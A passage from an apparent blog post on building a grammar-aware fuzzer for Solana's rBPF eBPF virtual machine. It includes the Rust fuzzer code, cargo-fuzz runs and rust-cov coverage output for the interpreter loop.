  943|  1.12k|                ebpf::SUB64_IMM  => reg[dst] = reg[dst].wrapping_sub(insn.imm as u64),
  944|    721|                ebpf::SUB64_REG  => reg[dst] = reg[dst].wrapping_sub(reg[src]),
  945|  3.06k|                ebpf::MUL64_IMM  => reg[dst] = reg[dst].wrapping_mul(insn.imm as u64),
  946|  1.71k|                ebpf::MUL64_REG  => reg[dst] = reg[dst].wrapping_mul(reg[src]),
  947|  1.39k|                ebpf::DIV64_IMM  => reg[dst] /= insn.imm as u64,
  948|       |                ebpf::DIV64_REG  => {
  949|     23|                    if reg[src] == 0 {
  950|     12|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  951|     11|                    }
  952|     11|                                    reg[dst] /= reg[src];
  953|       |                },
  954|       |                ebpf::SDIV64_IMM  => {
  955|  1.40k|                    if reg[dst] as i64 == i64::MIN && insn.imm == -1 {
                                                                    ^0
  956|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  957|  1.40k|                    }
  958|  1.40k|
  959|  1.40k|                    reg[dst] = (reg[dst] as i64 / insn.imm) as u64
  960|       |                }
  961|       |                ebpf::SDIV64_REG  => {
  962|     12|                    if reg[src] == 0 {
  963|      5|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  964|      7|                    }
  965|      7|                    if reg[dst] as i64 == i64::MIN && reg[src] as i64 == -1 {
                                                                    ^0
  966|      0|                        return Err(EbpfError::DivideOverflow(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  967|      7|                    }
  968|      7|                    reg[dst] = (reg[dst] as i64 / reg[src] as i64) as u64;
  969|       |                },
  970|    838|                ebpf::OR64_IMM   => reg[dst] |=  insn.imm as u64,
  971|  1.37k|                ebpf::OR64_REG   => reg[dst] |=  reg[src],
  972|  2.14k|                ebpf::AND64_IMM  => reg[dst] &=  insn.imm as u64,
  973|  4.47k|                ebpf::AND64_REG  => reg[dst] &=  reg[src],
  974|      0|                ebpf::LSH64_IMM  => reg[dst] = reg[dst].wrapping_shl(insn.imm as u32),
  975|  1.73k|                ebpf::LSH64_REG  => reg[dst] = reg[dst].wrapping_shl(reg[src] as u32),
  976|      0|                ebpf::RSH64_IMM  => reg[dst] = reg[dst].wrapping_shr(insn.imm as u32),
  977|  1.03k|                ebpf::RSH64_REG  => reg[dst] = reg[dst].wrapping_shr(reg[src] as u32),
  978|  5.59k|                ebpf::NEG64      => reg[dst] = (reg[dst] as i64).wrapping_neg() as u64,
  979|  2.85k|                ebpf::MOD64_IMM  => reg[dst] %= insn.imm  as u64,
  980|       |                ebpf::MOD64_REG  => {
  981|      3|                    if reg[src] == 0 {
  982|      2|                        return Err(EbpfError::DivideByZero(pc + ebpf::ELF_INSN_DUMP_OFFSET));
  983|      1|                    }
  984|      1|                                    reg[dst] %= reg[src];
  985|       |                },
  986|  2.28k|                ebpf::XOR64_IMM  => reg[dst] ^= insn.imm as u64,
  987|  1.41k|                ebpf::XOR64_REG  => reg[dst] ^= reg[src],
  988|    383|                ebpf::MOV64_IMM  => reg[dst] =  insn.imm as u64,
  989|  4.24k|                ebpf::MOV64_REG  => reg[dst] =  reg[src],
  990|      0|                ebpf::ARSH64_IMM => reg[dst] = (reg[dst] as i64).wrapping_shr(insn.imm as u32) as u64,
  991|    357|                ebpf::ARSH64_REG => reg[dst] = (reg[dst] as i64).wrapping_shr(reg[src] as u32) as u64,
  992|       |
  993|       |                // BPF_JMP class
  994|  4.43k|                ebpf::JA         =>                                          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
  995|     10|                ebpf::JEQ_IMM    => if  reg[dst] == insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
  996|  1.36k|                ebpf::JEQ_REG    => if  reg[dst] == reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.36k                                                        ^2
  997|  4.16k|                ebpf::JGT_IMM    => if  reg[dst] >  insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.42k                                                        ^2.74k
  998|  1.73k|                ebpf::JGT_REG    => if  reg[dst] >  reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.39k                                                        ^343
  999|    343|                ebpf::JGE_IMM    => if  reg[dst] >= insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1000|  2.04k|                ebpf::JGE_REG    => if  reg[dst] >= reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.70k                                                        ^342
 1001|  2.04k|                ebpf::JLT_IMM    => if  reg[dst] <  insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^2.04k                                                        ^1
 1002|    342|                ebpf::JLT_REG    => if  reg[dst] <  reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1003|  1.02k|                ebpf::JLE_IMM    => if  reg[dst] <= insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                                                                                         ^0
 1004|  2.38k|                ebpf::JLE_REG    => if  reg[dst] <= reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^2.38k                                                        ^1
 1005|  1.76k|                ebpf::JSET_IMM   => if  reg[dst] &  insn.imm as u64 != 0     { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.42k                                                        ^347
 1006|    686|                ebpf::JSET_REG   => if  reg[dst] &  reg[src]        != 0     { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1007|  6.48k|                ebpf::JNE_IMM    => if  reg[dst] != insn.imm as u64          { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                                                                                         ^0
 1008|  2.44k|                ebpf::JNE_REG    => if  reg[dst] != reg[src]                 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.40k                                                        ^1.03k
 1009|  18.1k|                ebpf::JSGT_IMM   => if  reg[dst] as i64 >   insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^17.7k                                                        ^363
 1010|  2.08k|                ebpf::JSGT_REG   => if  reg[dst] as i64 >   reg[src]  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^2.07k                                                        ^12
 1011|  14.3k|                ebpf::JSGE_IMM   => if  reg[dst] as i64 >=  insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^12.9k                                                        ^1.37k
 1012|  3.45k|                ebpf::JSGE_REG   => if  reg[dst] as i64 >=  reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^3.44k                                                        ^12
 1013|  1.36k|                ebpf::JSLT_IMM   => if (reg[dst] as i64) <  insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^1.02k                                                        ^346
 1014|      2|                ebpf::JSLT_REG   => if (reg[dst] as i64) <  reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^0
 1015|  2.05k|                ebpf::JSLE_IMM   => if (reg[dst] as i64) <= insn.imm  as i64 { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^2.04k                                                        ^14
 1016|  6.83k|                ebpf::JSLE_REG   => if (reg[dst] as i64) <= reg[src] as i64  { next_pc = (next_pc as isize + insn.off as isize) as usize; },
                                                                                           ^6.83k                                                        ^7
 1017|       |
 1018|       |                ebpf::CALL_REG   => {
 1019|      0|                    let target_address = reg[insn.imm as usize];
 1020|      0|                    reg[ebpf::FRAME_PTR_REG] =
 1021|      0|                        self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1022|      0|                    if target_address < self.program_vm_addr {
 1023|      0|                        return Err(EbpfError::CallOutsideTextSegment(pc + ebpf::ELF_INSN_DUMP_OFFSET, target_address / ebpf::INSN_SIZE as u64 * ebpf::INSN_SIZE as u64));
 1024|      0|                    }
 1025|      0|                    next_pc = self.check_pc(pc, (target_address - self.program_vm_addr) as usize / ebpf::INSN_SIZE)?;
 1026|       |                },
 1027|       |
 1028|       |                // Do not delegate the check to the verifier, since registered functions can be
 1029|       |                // changed after the program has been verified.
 1030|       |                ebpf::CALL_IMM => {
 1031|     22|                    let mut resolved = false;
 1032|     22|                    let (syscalls, calls) = if config.static_syscalls {
 1033|     22|                        (insn.src == 0, insn.src != 0)
 1034|       |                    } else {
 1035|      0|                        (true, true)
 1036|       |                    };
 1037|       |
 1038|     22|                    if syscalls {
 1039|      2|                        if let Some(syscall) = self.executable.get_syscall_registry().lookup_syscall(insn.imm as u32) {
                                                  ^0
 1040|      0|                            resolved = true;
 1041|      0|
 1042|      0|                            if config.enable_instruction_meter {
 1043|      0|                                let _ = instruction_meter.consume(*last_insn_count);
 1044|      0|                            }
 1045|      0|                            *last_insn_count = 0;
 1046|      0|                            let mut result: ProgramResult<E> = Ok(0);
 1047|      0|                            (unsafe { std::mem::transmute::<u64, SyscallFunction::<E, *mut u8>>(syscall.function) })(
 1048|      0|                                self.syscall_context_objects[SYSCALL_CONTEXT_OBJECTS_OFFSET + syscall.context_object_slot],
 1049|      0|                                reg[1],
 1050|      0|                                reg[2],
 1051|      0|                                reg[3],
 1052|      0|                                reg[4],
 1053|      0|                                reg[5],
 1054|      0|                                &self.memory_mapping,
 1055|      0|                                &mut result,
 1056|      0|                            );
 1057|      0|                            reg[0] = result?;
 1058|      0|                            if config.enable_instruction_meter {
 1059|      0|                                remaining_insn_count = instruction_meter.get_remaining();
 1060|      0|                            }
 1061|      2|                        }
 1062|     20|                    }
 1063|       |
 1064|     22|                    if calls {
 1065|     20|                        if let Some(target_pc) = self.executable.lookup_bpf_function(insn.imm as u32) {
                                                  ^0
 1066|      0|                            resolved = true;
 1067|       |
 1068|       |                            // make BPF to BPF call
 1069|      0|                            reg[ebpf::FRAME_PTR_REG] =
 1070|      0|                                self.stack.push(&reg[ebpf::FIRST_SCRATCH_REG..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS], next_pc)?;
 1071|      0|                            next_pc = self.check_pc(pc, target_pc)?;
 1072|     20|                        }
 1073|      2|                    }
 1074|       |
 1075|     22|                    if !resolved {
 1076|     22|                        if config.disable_unresolved_symbols_at_runtime {
 1077|      6|                            return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET));
 1078|       |                        } else {
 1079|     16|                            self.executable.report_unresolved_symbol(pc)?;
 1080|       |                        }
 1081|      0|                    }
 1082|       |                }
 1083|       |
 1084|       |                ebpf::EXIT => {
 1085|     14|                    match self.stack.pop::<E>() {
 1086|      0|                        Ok((saved_reg, frame_ptr, ptr)) => {
 1087|      0|                            // Return from BPF to BPF call
 1088|      0|                            reg[ebpf::FIRST_SCRATCH_REG
 1089|      0|                                ..ebpf::FIRST_SCRATCH_REG + ebpf::SCRATCH_REGS]
 1090|      0|                                .copy_from_slice(&saved_reg);
 1091|      0|                            reg[ebpf::FRAME_PTR_REG] = frame_ptr;
 1092|      0|                            next_pc = self.check_pc(pc, ptr)?;
 1093|       |                        }
 1094|       |                        _ => {
 1095|     14|                            return Ok(reg[0]);
 1096|       |                        }
 1097|       |                    }
 1098|       |                }
 1099|      0|                _ => return Err(EbpfError::UnsupportedInstruction(pc + ebpf::ELF_INSN_DUMP_OFFSET)),
 1100|       |            }
 1101|       |
 1102|   135k|            if config.enable_instruction_meter && *last_insn_count >= remaining_insn_count {
 1103|       |                // Use `pc + instruction_width` instead of `next_pc` here because jumps and calls don't continue at the end of this instruction
 1104|    130|                return Err(EbpfError::ExceededMaxInstructions(pc + instruction_width + ebpf::ELF_INSN_DUMP_OFFSET, initial_insn_count));
 1105|   135k|            }
 1106|       |        }
 1107|       |
 1108|    419|        Err(EbpfError::ExecutionOverrun(
 1109|    419|            next_pc + ebpf::ELF_INSN_DUMP_OFFSET,
 1110|    419|        ))
 1111|    763|    }

Unfortunately, this fuzzer doesn’t seem to achieve the coverage we expect. Several instructions are missed (note the 0 coverage on some branches of the match) and there are no jumps, calls, or other control-flow-relevant instructions. This is largely because throwing random bytes at any parser just isn’t going to be effective; most things will get caught at the verification stage, and very little will actually test the program.

We must improve this before we continue or we’ll be waiting forever for our fuzzer to find useful bugs.

At this point, we’re about two hours into development.

The smart fuzzer

eBPF is a quite simple instruction set; you can read the whole definition in just a few pages. Knowing this: why don’t we constrain our input to just these instructions? This approach is commonly called “grammar-aware” fuzzing on account of the fact that the inputs are constrained to some grammar. It is very powerful as a concept, and is used to test a variety of large targets which have strict parsing rules.

To create this grammar-aware fuzzer, I inspected the helpfully-named and provided insn_builder.rs which would allow me to create instructions. Now, all I needed to do was represent all the different instructions. By cross referencing with eBPF documentation, we can represent each possible operation in a single enum. You can see the whole grammar.rs in the rBPF repo if you wish, but the two most relevant sections are provided below.

Defining the enum that represents all instructions

#[derive(arbitrary::Arbitrary, Debug, Eq, PartialEq)]
pub enum FuzzedOp {
    Add(Source),
    Sub(Source),
    Mul(Source),
    Div(Source),
    BitOr(Source),
    BitAnd(Source),
    LeftShift(Source),
    RightShift(Source),
    Negate,
    Modulo(Source),
    BitXor(Source),
    Mov(Source),
    SRS(Source),
    SwapBytes(Endian),
    Load(MemSize),
    LoadAbs(MemSize),
    LoadInd(MemSize),
    LoadX(MemSize),
    Store(MemSize),
    StoreX(MemSize),
    Jump,
    JumpC(Cond, Source),
    Call,
    Exit,
}

Translating FuzzedOps to BpfCode

pub type FuzzProgram = Vec<FuzzedInstruction>;

pub fn make_program(prog: &FuzzProgram, arch: Arch) -> BpfCode {
    let mut code = BpfCode::default();
    for inst in prog {
        match inst.op {
            FuzzedOp::Add(src) => code
                .add(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Sub(src) => code
                .sub(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Mul(src) => code
                .mul(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Div(src) => code
                .div(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::BitOr(src) => code
                .bit_or(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::BitAnd(src) => code
                .bit_and(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::LeftShift(src) => code
                .left_shift(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::RightShift(src) => code
                .right_shift(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Negate => code
                .negate(arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Modulo(src) => code
                .modulo(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::BitXor(src) => code
                .bit_xor(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Mov(src) => code
                .mov(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::SRS(src) => code
                .signed_right_shift(src, arch)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::SwapBytes(endian) => code
                .swap_bytes(endian)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Load(mem) => code
                .load(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::LoadAbs(mem) => code
                .load_abs(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::LoadInd(mem) => code
                .load_ind(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::LoadX(mem) => code
                .load_x(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Store(mem) => code
                .store(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::StoreX(mem) => code
                .store_x(mem)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Jump => code
                .jump_unconditional()
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::JumpC(cond, src) => code
                .jump_conditional(cond, src)
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Call => code
                .call()
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
            FuzzedOp::Exit => code
                .exit()
                .set_dst(inst.dst)
                .set_src(inst.src)
                .set_off(inst.off)
                .set_imm(inst.imm)
                .push(),
        };
    }
    code
}

You’ll see here that our generation doesn’t really care to ensure that instructions are valid, just that they’re in the right format. For example, we don’t verify registers, addresses, jump targets, etc.; we just slap it together and see if it works. This is to prevent over-specialisation, where our attempts to fuzz things only make “boring” inputs that don’t test cases that would normally be considered invalid.

Okay – let’s make a fuzzer with this. The only real difference here is that our input format is now changed to have our new FuzzProgram type instead of raw bytes:

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    prog: FuzzProgram,
    mem: Vec<u8>,
    arch: Arch,
}

The whole fuzzer, though really it's not that different

This fuzzer expresses a particular stage in development. The differential fuzzer is significantly different in a few key aspects that will be discussed later.

#![feature(bench_black_box)]
#![no_main]

use std::collections::BTreeMap;
use std::hint::black_box;

use libfuzzer_sys::fuzz_target;

use grammar_aware::*;
use solana_rbpf::{
    elf::{register_bpf_function, Executable},
    insn_builder::{Arch, IntoBytes},
    memory_region::MemoryRegion,
    user_error::UserError,
    verifier::check,
    vm::{EbpfVm, SyscallRegistry, TestInstructionMeter},
};

use crate::common::ConfigTemplate;

mod common;
mod grammar_aware;

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    prog: FuzzProgram,
    mem: Vec<u8>,
    arch: Arch,
}

fuzz_target!(|data: FuzzData| {
    let prog = make_program(&data.prog, data.arch);
    let config = data.template.into();
    if check(prog.into_bytes(), &config).is_err() {
        // verify please
        return;
    }
    let mut mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        prog.into_bytes(),
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    let mem_region = MemoryRegion::new_writable(&mem, ebpf::MM_INPUT_START);
    let mut vm =
        EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![mem_region]).unwrap();

    drop(black_box(vm.execute_program_interpreted(
        &mut TestInstructionMeter { remaining: 1 << 16 },
    )));
});

Evaluation

Let’s see how well this version covers our target now.

$ cargo +nightly fuzz run smart -- -max_total_time=60
... snip ...
#1449846	REDUCE cov: 1730 ft: 6369 corp: 1019/168Kb lim: 4096 exec/s: 4832 rss: 358Mb L: 267/2963 MS: 1 EraseBytes-
#1450798	NEW    cov: 1730 ft: 6370 corp: 1020/168Kb lim: 4096 exec/s: 4835 rss: 358Mb L: 193/2963 MS: 2 InsertByte-InsertRepeatedBytes-
#1451609	NEW    cov: 1730 ft: 6371 corp: 1021/168Kb lim: 4096 exec/s: 4838 rss: 358Mb L: 108/2963 MS: 1 ChangeByte-
#1452095	NEW    cov: 1730 ft: 6372 corp: 1022/169Kb lim: 4096 exec/s: 4840 rss: 358Mb L: 108/2963 MS: 1 ChangeByte-
#1452830	DONE   cov: 1730 ft: 6372 corp: 1022/169Kb lim: 4096 exec/s: 4826 rss: 358Mb
Done 1452830 runs in 301 second(s)

Notice that our number of inputs tried (the number farthest left) is nearly half, but our cov and ft values are significantly higher.

Let’s evaluate that coverage a little more specifically:

$ cargo +nightly fuzz coverage smart
$ rust-cov show -Xdemangler=rustfilt fuzz/target/x86_64-unknown-linux-gnu/release/smart -instr-profile=fuzz/coverage/smart/coverage.profdata -show-line-counts-or-regions -show-instantiations -name=execute_program_interpreted_inner

Command output of rust-cov

<solana_rbpf::vm::EbpfVm<solana_rbpf::user_error::UserError, solana_rbpf::vm::TestInstructionMeter>>::execute_program_interpreted_inner:
  709|    886|    fn execute_program_interpreted_inner(
  710|    886|        &mut self,
  711|    886|        instruction_meter: &mut I,
  712|    886|        initial_insn_count: u64,
  713|    886|        last_insn_count: &mut u64,
  714|    886|    ) -> ProgramResult<E> {
  715|    886|        // R1 points to beginning of input memory, R10 to the stack of the first frame
  716|    886|        let mut reg: [u64; 11] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, self.stack.get_frame_ptr()];
  717|    886|        reg[1] = ebpf::MM_INPUT_START;
  718|    886|
  719|    886|        // Loop on instructions
  720|    886|        let config = self.executable.get_config();
  721|    886|        let mut next_pc: usize = self.executable.get_entrypoint_instruction_offset()?;
                                                                                                  ^0
  722|    886|        let mut remaining_insn_count = initial_insn_count;
  723|  2.16M|        while (next_pc + 1) * ebpf::INSN_SIZE <= self.program.len() {
  724|  2.16M|            *last_insn_count += 1;
  725|  2.16M|            let pc = next_pc;
  726|  2.16M|            next_pc += 1;
  727|  2.16M|            let mut instruction_width = 1;
  728|  2.16M|            let mut insn = ebpf::get_insn_unchecked(self.program, pc);
  729|  2.16M|            let dst = insn.dst as usize;
  730|  2.16M|            let src = insn.src as usize;
  731|  2.16M|
  732|  2.16M|            if config.enable_instruction_tracing {
  733|      0|                let mut state = [0u64; 12];
  734|      0|                state[0..11].copy_from_slice(&reg);
  735|      0|                state[11] = pc as u64;
  736|      0|                self.tracer.trace(state);
  737|  2.16M|            }
  738|       |
  739|  2.16M|            match insn.opc {
  740|  2.16M|                _ if dst == STACK_PTR_REG && config.dynamic_stack_frames => {
  741|      6|                    match insn.opc {
  742|      2|                        ebpf::SUB64_IMM => self.stack.resize_stack(-insn.imm),
  743|      4|                        ebpf::ADD64_IMM => self.stack.resize_stack(insn.imm),
  744|       |                        _ => {
  745|       |                            #[cfg(debug_assertions)]
  746|      0|                            unreachable!("unexpected insn on r11")
  747|       |                        }
  748|       |                    }
  749|       |                }
  750|       |
  751|       |                // BPF_LD class
  752|       |                // Since this pointer is constant, and since we already know it (ebpf::MM_INPUT_START), do not
  753|       |                // bother re-fetching it, just use ebpf::MM_INPUT_START already.
  754|       |                ebpf::LD_ABS_B   => {
  755|      5|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  756|      5|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^2
  757|      2|                    reg[0] = unsafe { *host_ptr as u64 };
  758|       |                },
  759|       |                ebpf::LD_ABS_H   =>  {
  760|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  761|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^1
  762|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  763|       |                },
  764|       |                ebpf::LD_ABS_W   => {
  765|      6|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  766|      6|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^2
  767|      2|                    reg[0] = unsafe { *host_ptr as u64 };
  768|       |                },
  769|       |                ebpf::LD_ABS_DW  => {
  770|      4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  771|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^1
  772|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  773|       |                },
  774|       |                ebpf::LD_IND_B   => {
  775|      9|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  776|      9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^1
  777|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  778|       |                },
  779|       |                ebpf::LD_IND_H   => {
  780|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  781|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^1
  782|      1|                    reg[0] = unsafe { *host_ptr as u64 };
  783|       |                },
  784|       |                ebpf::LD_IND_W   => {
  785|      4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  786|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^2
  787|      2|                    reg[0] = unsafe { *host_ptr as u64 };
  788|       |                },
  789|       |                ebpf::LD_IND_DW  => {
  790|      2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  791|      2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^0
  792|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  793|       |                },
  794|       |
  795|      6|                ebpf::LD_DW_IMM  => {
  796|      6|                    ebpf::augment_lddw_unchecked(self.program, &mut insn);
  797|      6|                    instruction_width = 2;
  798|      6|                    next_pc += 1;
  799|      6|                    reg[dst] = insn.imm as u64;
  800|      6|                },
  801|       |
  802|       |                // BPF_LDX class
  803|       |                ebpf::LD_B_REG   => {
  804|     21|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  805|     21|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^4
  806|      4|                    reg[dst] = unsafe { *host_ptr as u64 };
  807|       |                },
  808|       |                ebpf::LD_H_REG   => {
  809|      4|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  810|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^1
  811|      1|                    reg[dst] = unsafe { *host_ptr as u64 };
  812|       |                },
  813|       |                ebpf::LD_W_REG   => {
  814|     26|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  815|     26|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^19
  816|     19|                    reg[dst] = unsafe { *host_ptr as u64 };
  817|       |                },
  818|       |                ebpf::LD_DW_REG  => {
  819|      5|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  820|      5|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^1
  821|      1|                    reg[dst] = unsafe { *host_ptr as u64 };
  822|       |                },
  823|       |
  824|       |                // BPF_ST class
  825|       |                ebpf::ST_B_IMM   => {
  826|      8|                    let vm_addr = (reg[dst] as i64).wrapping_add( insn.off as i64) as u64;
  827|      8|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                      ^1
  828|      1|                    unsafe { *host_ptr = insn.imm as u8 };
  829|       |                },
  830|       |                ebpf::ST_H_IMM   => {
  831|     11|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  832|     11|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u16);
                                      ^6
  833|      6|                    unsafe { *host_ptr = insn.imm as u16 };
  834|       |                },
  835|       |                ebpf::ST_W_IMM   => {
  836|      9|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  837|      9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u32);
                                      ^6
  838|      6|                    unsafe { *host_ptr = insn.imm as u32 };
  839|       |                },
  840|       |                ebpf::ST_DW_IMM  => {
  841|     16|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  842|     16|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u64);
                                      ^11
  843|     11|                    unsafe { *host_ptr = insn.imm as u64 };
  844|       |                },
  845|       |
  846|       |                // BPF_STX class
  847|       |                ebpf::ST_B_REG   => {
  848|      9|                    let vm_addr = (reg[dst] as i64).wrapping_add(insn.off as i64) as u64;
  849|      9|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Store, pc, u8);
                                      ^2
